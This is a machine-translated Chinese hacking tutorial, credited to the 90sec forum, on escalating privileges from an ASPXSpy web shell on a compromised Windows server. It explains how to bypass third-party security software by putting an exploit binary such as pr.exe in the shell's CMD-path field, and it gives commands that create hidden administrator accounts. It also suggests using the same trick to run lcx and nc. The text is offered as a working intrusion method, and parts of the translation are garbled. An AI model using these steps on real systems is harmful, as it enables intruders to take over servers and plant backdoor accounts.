Run the CMD command to directly call the EXP overflow and principle analysis process.

1. Problems Encountered during permission escalation
2. program running and parameter calling
3. Skip the restriction
1. Problems Encountered during permission escalation
I think you have encountered this problem when raising the permission, that is, to find a readable and writable directory, upload a CMD, and call CMD to execute some doscommands, such as ver, whoami, and systeminfo. if there are no restrictions on net, netstat, and tasklist, you can also execute commands such as net user, net start, and netstat-ano.
At this time, we may first think of uploading the PR, IIS, and other elevation kill local overflow Elevation of Privilege, so we will upload the kill to the upload CMD directory to prepare for Elevation of Privilege, we use the classic ASP. for example, assume C: \ RECYCLER \ is a readable and writable directory.
To use the shell CMD command function, we need to fill in two places, one is the CMD path, and the other is the text input area above, what we can see below is/c set. We can see that it is a set command. Www.2cto.com

Therefore, enter C: \ RECYCLER \ CMD.exe in the above CMD path, change set to ver and click execute below to see the echo, indicating the system version. then, we will overflow the ver with the EXP path, for example, PR. Below we will change ver to C: \ RECYCLER \ pr.exe, and then click Run. This happens without echo. Even if you change it to C: \ RECYCLER \ pr.exe "net user 90sec 90sec/add", the execution still does not show back. Why ??? Is it patch ??? We use the systeminfo command to find that there is no KB952004 patch. It indicates that PR can overflow. Why is there no echo ??? We used the net user command and found that the account 90sec was not added. Why ??? Some people may say that this directory does not have the executable permission, but our CMD can run. It indicates that it is not a problem that there is no executable permission. at this time, you may try Brazilian barbecue or IIS, but the same is true. You may also say that the net has been deleted or the permission is restricted. If we use the self-uploaded net to add an account, we still did not display it back. If we use netuser to view it, it indicates that no account has been added. If we use the ver command again, we still do not display the result back to a text and find that this text is not generated, it means that the simplest ver command cannot be executed.
The problem arises: The readable and writable executable directory cannot run the program!
(The problem should be caused by third-party software)
 
 
2. program running and parameter calling
Let's take a look at how CMD runs parameters. Taking SU Local Elevation of Privilege as an example, we can find that there is a command below: cmd/c net user hacker $ hacker/add & net localgroup administrators hacker $/add
After analyzing this command, we can find that cmd is under the system32 directory, while net user hacker $ hacker/add & net localgroup administrators hacker $/add is our command, we can find that there is a/c and some spaces in the middle. Why? In fact, the cmd/c "command" is the call method of the parameters run by cmd. We use ASPXSpy to execute the command in cmd. We can find that the command usually changes the set as the command, the preceding/c and space are ignored. According to the principle of the system command execution parameter, we can think of the above cmd path + space + the following command: C: \ RECYCLER \ cmd.exe/c set, which is a runtime logic. We can find that there is no/c between pr and command, but there is a space in the middle. in this way, we can find a way to directly call PR for Parameter Overflow.
3. Skip the restriction
 
 
 
Analyze, CMD executes a command, that is, the path of the Program (CMD) + space (ASPXSpy2 will help you fill in this space) +/c "command ", that is to say, we do not need to enter spaces between the program and the command. then, enter the PR path C: \ RECYCLER \ pr.exe In the CMD path, then run the command to clear/c set and enter "net user 90sec 90sec/add ". Let's analyze the operation of ASPXSpy2. It will run with C: \ RECYCLER \ pr.exe "net user 90sec 90sec/add, it will add a space after the above CMD path and then add the following parameters to the system for running. in this case, the space after C: \ RECYCLER \ pr.exe does not need to be entered, because ASPXSpy2 will help us fill in this space. We can directly enter the EXP path in the CMD path, enter the "parameter" in the command to run EXP. in this way, we can skip some third-party software restrictions (that is, the problems we encountered in the first part ).
Idea Extension: We can also skip this method to limit the running of other EXP, lcx, nc, and other programs.
Author: Q1anXun e-MAIL: 790138695@qq.com
 
Copyright: 90sec (www.90sec.org)